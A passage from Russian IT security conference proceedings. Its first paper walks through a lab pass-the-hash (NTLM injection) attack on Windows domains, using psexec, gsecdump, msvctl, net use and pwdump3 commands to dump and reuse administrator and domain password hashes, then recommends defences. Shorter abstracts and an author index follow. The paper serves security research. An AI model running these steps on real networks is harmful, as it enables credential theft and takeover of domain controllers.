систему компании становится лишь вопросом времени. Мною была выполнена имитация атаки с использованием NTLM-инъекции со следующими исходными условиями: Active Directory (Windows 2003), рабочие станции Windows XP SP3; злоумышленник смог получить пароль локального администратора на пользовательских рабочих станциях; у злоумышленника есть возможность определить имя учетной записи администратора домена (либо он знает фамилию, либо из имени учетной записи администратора понятно, какими привилегиями обладает учетная запись). 1. Поиск учетной записи администратора. Программные средства: утилита LanSpy.
IT security conference for the next generation
74
С помощью утилиты LanSpy сканируем все доступные рабочие станции, пока не найдем ту, за которой работает администратор домена. Пусть его учетная запись будет называться coolAdmin. Определив IP-адрес рабочей станции, за которой находится администратор, переходим к пункту 2. 2. Получение хеша пароля администратора. Программные средства: утилита gsecdump, утилита psexec С помощью утилиты gsecdump получаем хеши паролей учетных записей пользователей, залогинившихся на данную рабочую станцию: C:\>psexec -s -u администратор -p athu.cjy@)!)123 \\192.168.72.6 -c gsecdump.exe -u PsExec v1.96 - Execute processes remotely Copyright (C) 2001-2009 Mark Russinovich Sysinternals - www.sysinternals.com WS2003\coolAdmin::8361e3e93c5dda36b22bec7c7dfa5a92:aaa966422ce1fdbfe5d91 92e8adb6ce8 ::: WS2003\WS4$::00000000000000000000000000000000:72c2322cf475d3c64f92607dbd 87b466::: WS2003\WS4$::00000000000000000000000000000000:72c2322cf475d3c64f92607dbd 87b466::: gsecdump.exe exited on 192.168.72.6 with error code 0. Уже на этом этапе можно начать взламывать пароль администратора домена по его хешзначению, но нашей задачей является проверка возможности компрометация всей сети. 3. Подключение к административному скрытому ресурсу IPC$. Программные средства: утилита msvctl, команда net use; Скопировав полученный хеш пароля, запускаем интерпретатор командной строки уже от имени администратора домена с помощью специально для этого разработанной утилиты msvctl: C:\>msvctl.exe coolAdmin::8361e3e93c5dda36b22bec7c7dfa5a92:aaa966422 ce1fdbfe5d9192e8adb6ce8::: run cmd И в появившемся окне, устанавливаем соединение с контроллером домена: C:\>net use \\192.168.72.1\IPC$ 4. Получение хешей паролей всех пользователей домена. Программные средства: утилита pwdump3. С помощью утилиты pwdump3 загружаем хэши паролей всех пользователей, причем в данном случае нам не нужно вводить пароль администратора: C:\>pwdump3.exe 192.168.72.1 h:\hashes.txt Теперь потенциальный злоумышленник обладает хешами паролей всех пользователей, и их взлом является уже делом времени. Можно сделать вывод, что сеть под управлением MS Windows Server 2003 R2 уязвима к атакам с использованием NTLM-иньекции. При разработке Windows Server 2008 было принято решение ограничить использование NTLM. NTLM в этой версии Windows – явный кандидат если и не на уничтожение, то, как минимум, на замену Kerberos везде, где это только возможно. Но, по-прежнему существуют случаи, в которых не обойтись без NTLM: сервер, к которому идет обращение, не находится в домене клиент или сервер не поддерживает Kerberos Также предусмотрен ряд улучшений улучшения: 1) Аудит NTLM 2) Задание порядка поиска в лесу AD 3) Политики блокирования NTLM И вот, мы подошли к главной причине, по которой в этой статье собраны материалы более чем десятилетней практики изучения уязвимостей протокола NTLM. Этой причиной является обратная совместимость. Так, только лишь в Windows Server 2008 генерация LM-хешей по умолчанию отключена (опция NoLmHash в разделе реестра HKLM\SYSTEM\CurrentControlSet\Control\Lsa), все предыдущие версии ОС, включая самый распространенный на сегодняшний день в корпоративной среде Windows Server 2003, по умолчанию генерируют и хранят LM-хеши для паролей, длина которых меньше 14 символов. Но необходимо учитывать еще то, что все серверные версии Windows, начиная с Server 2000, по умолчанию
IT security conference for the next generation
75
используют Kerberos для удаленной аутентификации пользователя или ресурса, протокол LM/NTLM challenge-response все еще поддерживается и может быть использован, если клиент инициирует такое соединение. За эту поддержку отвечает ключ реестра LmCompatibilityLevel в разделе реестра HKLM\SYSTEM\ CurrentControlSet\Control\Lsa, который может принимать целочисленное значение от 0 до 5: 0 – Клиенты: LM и NTLM, контроллеры: LM/NTLMv1/NTLMv2 1 – Клиенты: LM/NTLMv1/NTLMv2, контроллеры: LM/NTLMv1/NTLMv2 2 – Клиенты: NTLMv1/NTLMv2, контроллеры: LM/NTLM/NTLMv2 3 – Клиенты: NTLMv2, контроллеры: LM/NTLM/NTLMv2 4 – Клиенты: NTLMv2, контроллеры: NTLM/NTLMv2 5 – Клиенты: NTLMv2, контроллеры: NTLMv2 В настоящее время сама задача получения хеша является более чем актуальной. Так как даже в сети, построенной на самой современной на текущий день серверной платформе MS Windows Server 2008 R2, получение хотя бы одного хеша учетной записи, обладающей административными правами на каком-либо сервере, может привести к получению в итоге удаленного административного доступа к контроллеру домена, а значит, и ко всем серверам и рабочим станциям в домене. И так, я попытался провести атаку с использованием NTLM-инъекции в сети под управлением Windows Server 2008 R2. Последовательность действий при атаке была та же, что и для Windows Server 2003 но выполнить 4 пункт атаки уже не удалось. Команда C:\>pwdump3.exe 192.168.72.1 h:\hashes.txt не выполнилась, доступ запрещен. Таким образом, всю сеть под управлением MS Windows Server 2008 R2 при использованием NTLM-инъекции, скомпрометировать нельзя, но даже под управлением этой ОС проявилась очень серьезная уязвимость: злоумышленник легко может подключиться к реестру сервера и редактировать его. Для этого ему необходим тот же набор программных средств, что и в предыдущей атаке и выполнение следующих действий: C:\>psexec -s -u администратор -p athu.cjy@)!)12 \\192.168.72.11 -c gsecdump.exe -u PsExec v1.96 - Execute processes remotely Copyright (C) 2001-2009 Mark Russinovich Sysinternals - www.sysinternals.com WS2008\coolAdmin::8361e3e93c5dda36b22bec7c7dfa5a92:aaa966422ce1fdbfe5d91 92e8adb6ce8 ::: WS2008\WS7$::00000000000000000000000000000000:72c2322cf475d3c64f92607dbd 87b466::: WS2008\WS7$::00000000000000000000000000000000:72c2322cf475d3c64f92607dbd 87b466::: gsecdump.exe exited on 192.168.72.6 with error code 0. C:\>msvctl.exe coolAdmin::8361e3e93c5dda36b22bec7c7dfa5a92:aaa966422ce1f dbfe5d9192e8 adb6ce8::: run cmd В появившемся окне: C:\>net use \\192.168.72.1\IPC$ C:\>regedit В появившемся редакторе реестра подключаем сетевой реестр, в качестве имени компьютера указываем имя контроллера домена. Сетевой реестр успешно подключается, при этом, не запрашивая ни единого пароля, и потенциальный злоумышленник получает полный контроль над реестром контроллера домена, где он может создавать/удалять разделы, создавать/удалять/редактировать параметры, назначать разрешения доступа. Хочу обратить внимание, что он может изменить опции и выше указанных ключей реестра, связанных с аутентификацией. И так мы видим, что даже в сети под управлением MS Windows Server 2008 R2, с помощью распространенных инструментов для проведения атак связанных с уязвимостями протокола NTLM, потенциальный злоумышленник может получить доступ к реестру контроллера домена. Очевидно, что никакая парольная политика от описанных атак не спасет, так пароль не подвергается расшифровке, а значит, его стойкость не имеет никакого значения. NTLM слишком «глубоко вшит» в систему и отключить его полностью не представляется возможным. Так, Windows 2000 при переходе на аутентификацию по смарт-картам хеш пароля все равно хранится в базе без изменений. IT security conference for the next generation
76
Специалисты из Compass Security AG провели исследование (http://www.csnc.ch/static/download/Hash_Injection_Attack_E.pdf), в котором попытались как полностью деактивировать аутентификационный пакет NTLM в реестре, так и физически удалить библиотеку MSV1_0.dll с рабочей станции под управлением Windows XP в домене. В обоих случаях ни локальный, ни доменный вход систему стал невозможен. Все типовые рекомендации (отключение хранения LM-хешей на серверах и рабочих станциях, выставление параметра LmCompatibilityLevel в максимально возможное значение, отключение локального хранения кэшированных аккаунтов и последующая очистка кэша и т.п.) не являются панацеей. В какой-то степени помочь может принудительное шифрование трафика и аутентификация хостов с помощью IPSec, для невозможности использования хеша с недоверенных систем. Для этого необходимо настроить соответствующие политики на контроллере домена. На мой взгляд, компании должны рассмотреть возможность внедрения следующих мер: Межсетевое экранирование сетевого сегмента, в котором размещаются рабочие станции администраторов; Внедрение процедуры присвоения имен пользовательским учетным записям, запрещающей использование слов-индикаторов, наподобие Adm, Admin, Test и т.п. Также задачу злоумышленнику значительно усложнит: Внедрение программы по управлению уязвимостями (регулярная установка обновлений на серверы и рабочие станции пользователей, контроль появления новых уязвимостей); Внедрение парольной политики, требующей от пользователей использование сложных паролей; Конфигурация систем в соответствии с наиболее безопасными практиками (например, LM-хеши паролей не должны храниться ни на контроллере домена, ни на рабочих станциях пользователей, так как их взломать можно намного быстрее по сравнению с NT-хешами); Использование антивирусного обеспечения (современными антивирусами большенство из применненных для проведения атак программных средств обнаруживается как HackTools).
IT security conference for the next generation
77
8
Секция
Экономические модели и аналитические аспекты информационной безопасности Некоторые подходы к оценке информационных рисков с использованием нечѐтких множеств Шевяхов М.Ю. ГОУ ВПО Международный Университет природы, общества и человека "Дубна", Институт системного анализа и управления Дубна, Россия
Аннотация: В статье проводится анализ различных подходов к оценке информационных рисков и предлагается новый подход с использованием теории нечѐтких множеств. Информационная безопасность в настоящее время становится необходимым условием развития хозяйствующего субъекта. Оценка информационных рисков ведѐтся по двум показателям: вероятности возникновения риска и ущерба от него. Чаще всего эти два показателя перемножают, и результат называют уровнем риска. Такой метод не работает в условиях неопределѐнности значений вероятности и ущерба риска. Также такой метод не всегда подходит организациям, чей бюджет на отдел информационной безопасности ограничен. Первая проблема решается применением теории нечѐтких множеств, которая, как следует из названия, позволяет работать с неопределѐнностью. Точнее, с неопределѐнностью лингвистической, когда показатели описываются не точными цифрами, а словами естественного языка. Вторая проблема может быть решена введением дополнительной переменной, характеризующей стоимость снижения риска до приемлемого уровня. В статье предлагается модель, которая использует и теорию нечѐтких множеств, и переменную, оценивающую стоимость снижения риска. Так как в основу положена теория нечѐтких множеств, такая модель состоит из правил типа «Если А, то Б». Заметим, что эта модель расширяема. К ней можно добавлять новые переменные, которые важны для конкретной организации, соответственно добавлять новые правила, необходимые для принятия решения. На примере показан процесс принятия решения по группе рисков, а именно упорядочивание их по порядку ликвидации в соответствии одной из двух выбранных стратегий ликвидации риска.
IT security conference for the next generation
78
Особенности рынка цифровой дистрибуции: защита информации в рамках сервиса цифровой дистрибуции Дубинин С.А. Соавтор: Маклаков В.И. Магнитогорский Государственный Университет Магнитогорск, Россия
[email protected] Актуальность проблемы и темы исследования определяется тем, что долгое время как такового рынка цифрового распространения контента в России не было – его формирование происходит буквально на наших глазах. К концу 2008 года показатель роста рынка цифрового контента в России достиг 50-70%. Основными драйверами эксперты называют сектора электронных книг, казуальных игр, музыки для мобильных телефонов, а также цифровые карты. "Аутсайдером" в 2008 году стала легальная аудио и видеопродукция, которую традиционно "не любит" отечественный пользователь. Несмотря на шаги в сторону популяризации легальных продаж, пользователи в целом недостаточно активно покупают цифровой контент. Доля пиратской продукции в России по-прежнему составляет более 95% и не поддается подсчету из-за отсутствия точных оценок объема данных, распространяемых через пиринговые сети. В итоге, с одной стороны, из-за пиратов, с другой — из-за пока недостаточного распространения Интернета в стране цифровая дистрибуция уступает обычной почти в 20 раз. Несмотря на шаги в сторону популяризации легальных продаж, пользователи в целом недостаточно активно покупают цифровой контент. Поскольку главной сложностью рынка цифровой дистрибуции контента называется пиратство, проблема защиты информации стоит особенно остро. Рассмотрев основные принципы распространения контента через Интернет и средства его защиты, можно оценить достаточную степень защищенности для формирования жизнеспособного рынка нефизического распространения цифровой продукции.
Обеспечение информационной безопасности в системе «1С:Предприятие 8.1» Султанов Шамиль Ф. Соавтор: Маклаков В.И. Магнитогорский Государственный Университет Магнитогорск, Россия
[email protected] Постоянное развитие информационных технологий и систем приводит, к сожалению, к обострению старых и появлению новых проблем. Одной из таких проблем является и проблема защиты информации - надежного обеспечения ее сохранности и установленного статуса использования. Поэтому обеспечение безопасности информации и информационных процессов является обязательной функцией современных информационных систем. Основными способами защиты от несанкционированного доступа к объектам информационных систем являются: идентификация и аутентификация пользователей информационных систем и активизированных ими процессов; авторизация субъектов (определение прав доступа субъекта к объекту с конфиденциальной информацией); аудит событий, имеющих отношение к безопасности информационной системы. Администратор базы данных в системе «1С:Предприятие 8.1» может создать и затем редактировать список пользователей, которым разрешена работа с системой. Но эта задача
IT security conference for the next generation
79
является минимальной обязательной частью. Более важным является выбор стратегии защиты и методы реализации. Наиболее безопасным способом аутентификации пользователей при их входе в систему «1С:Предприятие» будет объединение аутентификации средствами «1С:Предприятие» и средствами Windows. При этом целесообразно снятие флажка «Показывать в списке выбора» в группе свойств аутентификации «1С:Предприятие», а в параметрах безопасности Windows включить требования минимальной длины и сложности паролей, ограничения их максимального срока действия, неповторяемости паролей и их минимального срока действия и установить пороговое значение счетчика неудачных попыток входа в Windows. Необходимо иметь в виду, что список пользователей системы «1С:Предприятие» не является частью ее конфигурации, а создается отдельно для каждой организации, в которой эта система установлена. При авторизации пользователя в системе «1С:Предприятие» используется механизм ролей и интерфейсов, которые назначаются пользователю при создании или редактировании его учетной записи на вкладке «Прочие». Роль в системе «1С:Предприятие» представляет собой набор прав доступа к различным объектам базы данных. Обычно роли создаются для отдельных должностных обязанностей, а каждому пользователю системы может быть назначена одна или несколько ролей. Если пользователю назначены несколько ролей, то предоставление доступа ему к объекту базы данных будет произведено следующим образом [1]: Если в хотя бы одной из назначенных пользователю ролей запрашиваемый доступ разрешен, то он предоставляется пользователю. Если во всех назначенных пользователю ролях соответствующий доступ не разрешен, то запрашиваемый доступ не предоставляется. Для создания и редактирования ролей используется конфигуратор системы «1С:Предприятие». В процессе создания конфигурации создается набор типовых ролей, которые затем могут быть отредактированы. В системе «1С:Предприятие» различают два типа прав - основные и интерактивные. Основные права проверяются при любом обращении к объектам информационной системы. Проверка интерактивных прав производится при выполнении интерактивных операций (например, просмотре и редактировании данных в форме). Для разграничения доступа к объектам базы данных на уровне отдельных полей и записей в системе «1С:Предприятие» предусмотрен механизм ограничения доступа к данным (использования прав на чтение, добавление, изменение и удаление этих объектов). Для права чтения возможна установка нескольких ограничений на доступ, а для остальных указанных прав - только одного ограничения. Для каждого ограничения доступа к данным по праву чтения возможен выбор поля, по значению которого будет проверяться условие ограничения доступа, или указание «Прочие поля», что обеспечит проверку выполнения условия для каждого поля. Условие ограничения доступа к данным может быть определено с помощью конструктора или вручную, путем создания и редактирования именованных шаблонов ограничения доступа на вкладке «Шаблоны ограничений» окна редактирования роли. Важным моментом в обеспечении безопасности является возможность запуска внешних обработок. Через внешнюю обработку пользователь даже с минимальными правами может выполнить ряд критических операций. Одним из самых эффективных методов создания роли является следующий метод: Создается новая роль с набором прав, достаточных только запустить оболочку 1С Предприятие с полным запретом на любые операции. Добавляются права на запуск/выполнение процедур данной роли. Тестирование. События, которые должны регистрироваться в журнале регистрации системы «1С:Предприятие», могут быть указаны администратором с помощью функции его настройки. Здесь же возможен выбор периода времени, по истечении которого журнал регистрации будет сохраняться в новом файле, а также сокращение записей журнала до истечения указанного периода путем их удаления и, возможно, сохранения в файле. Приведенные выше методы позволяют достаточно эффективно решать проблемы информационной безопасности.
IT security conference for the next generation
80
Авторский указатель: Адамов Александр Семенович 26, 29, 67 Азизян Нина Ашотовна Антонов Алексей Евгеньевич Арутюнян Рафаел Сергеевич Баринов Андрей Евгеньевич Беркович Евгений Леонидович Бешенцева Мария Бондарева Мария Викторовна Бородина Кристина Геннадьевна Бочарникова Марина Владимировна Василега Ирина Александровна Викторова Татьяна Сергеевна Городилов Алексей Юрьевич Григорьев Николай Николаевич Гуляев Алексей Игоревич Даниелян Виктор Мкртичевич Дубинин Сергей Александрович Дураков Андрей Викторович Евстратов Лев Генадьевич Ершов Дмитрий Игоревич Идрисова Айгуль Рифкатовна Казимиров Александр Владимирович Канунников Дмитрий Сергеевич Ковалев Д.С. Коробулина Ольга Юрьевна Кренделев С.Ф. Кудияров Дмитрий Лабыскин Всеволод Николаевич Лотоцкий Александр Анатолиевич Лыжонков Дмитрий Юрьевич Люлько Иван Владимирович Макарян Александр Самвелович
Маклаков Владислав Игоревич 79, 79 Марданова Наталья Мифтахова Лина Хатыповна Моисеева Елизавета Сергеевна Овсепян Елена Олейник Глеб Игоревич Остапов Дмитрий Сергеевич Пепина Марина Александровна Рой Константин Сергеевич 52, 65 Саитов Марс Наилович Сапрыкин Александр Сергеевич Сафаргалеева Лилия Сергеева Алѐна Михайловна Сидоров Михаил Владимирович Солонская Оксана Игоревна Старцев Станислав Сергеевич Султанов Шамиль Фаритович Телипский Денис Анатольевич Тимохин Е. А. Ткачев Дмитрий Трубицина Анна Владимировна Туякбаев Арман Жамбулович Файзуллин Р.В. Фахриев Альберт Халитова Кристина Ибрагимовна Хачатуров Ашот Гагикович Чижевский Станислав Викторович Чичиков Анатолий Александрович Чудмаев Алексей Владмирович Шамаева Александра Александровна Шевяхов Максим Юрьевич Юрков Кирилл Александрович
